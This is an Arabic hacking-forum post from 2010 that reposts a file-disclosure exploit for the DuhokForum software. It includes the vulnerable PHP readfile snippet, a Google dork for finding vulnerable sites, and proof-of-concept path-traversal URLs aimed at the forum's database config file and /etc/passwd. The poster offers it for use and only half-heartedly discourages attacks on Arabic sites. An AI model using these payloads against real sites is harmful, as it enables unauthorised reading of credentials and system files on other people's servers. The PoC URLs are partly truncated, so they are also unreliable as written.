الموضوع: تغرةة منتديــآت (DuhokForum ( File Disclosure ...**!!
عرض مشاركة واحدة
قديم 05-03-2010, 03:42 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
D.r-HACKz
 
الصورة الرمزية D.r-HACKz
 

 
 
إحصائية العضو





D.r-HACKz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D.r-HACKz is on a distinguished road
افتراضي تغرةة منتديــآت (DuhokForum ( File Disclosure ...**!!

الســلآم عليــكم ورٍحمـــة اللــــــه وبرٍكـــآته
كيفكم يا شباب مرحبا بكم في موضوعي متواضع
حبيت اطرحلــكم ثغرٍهـ مكتشفهـآ من ثلاث او اربع آيـــآم ..< مدري اذا في احد مكتشفهــآ قبلي

وهي ثغرهـ بمنتديــآت DuhokForum من نوع File Disclosure ..< قرآءة ملفــآت
بس المشكلــه كلهــــــآ مواقع عربيــه ..< يعني ترىآ ابري ذمتي من يستخدمهــآ بمواقع عربيه مسالمه

سورٍس الثغــــــــــرٍهـ
================================================
DuhokForum <= Remote File Disclosure Vulnerability
================================================

[+] DuhokForum <= Remote File Disclosure Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> 0
0 \/___/ 1
1 1
0 [+] Site : wWw.Sa-HaCKeR.cOm 0
1 [+] Support e-mail : AgRaMkSa[at]w.cn 1
0 0
1 ###################################### 1
0 M...Q...S Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: DarK c0d3r
[+] Download:http://www.4shared.com/file/11767397...SATRTIMES.html
[+] Greetz: TiGeR HaCKeR . Mr.SHankeR

[+] Code:

if($file == "box_Table.htm"){
$filename = "box_Table.htm";
}
header('Content-type: text/html');
header('Content-transfer-encoding: binary');
header("Cache-Control: must-revalidate");
header($ExpStr);
readfile($filename);
=======================================
DorK : "inurl:index.php?mode=members"


[+] PoC: Http://site/paTH/editor/file.php?fil...de/connect.php <===== config

[+] PoC: Http://site/paTH/editor/file.php?fil.../../etc/passwd


================================================== ==================

شرٍح فيديوٍ لثغــــــرٍهـ علىآ السرٍيع

هنــــــــــــــآ

انتظرو الثــآنيــــه بآذن اللــــــــــــــــــه ..> لا لا للبرٍآيفت

See you

منقول من الاخ
DaRk-C0d3r
الاهداء
M!M0 ==ملك الاختراقات
VoLc4n0#####
NEVER HaCKEr
ولجميع اعضاء شبكة العنكبوتية


jyvmm lkj]dJJNj (DuhokForum ( File Disclosure >>>**!!

التوقيع

اي استفسار انا هنا

 

التعديل الأخير تم بواسطة D.r-HACKz ; 05-06-2010 الساعة 03:10 PM.

   

رد مع اقتباس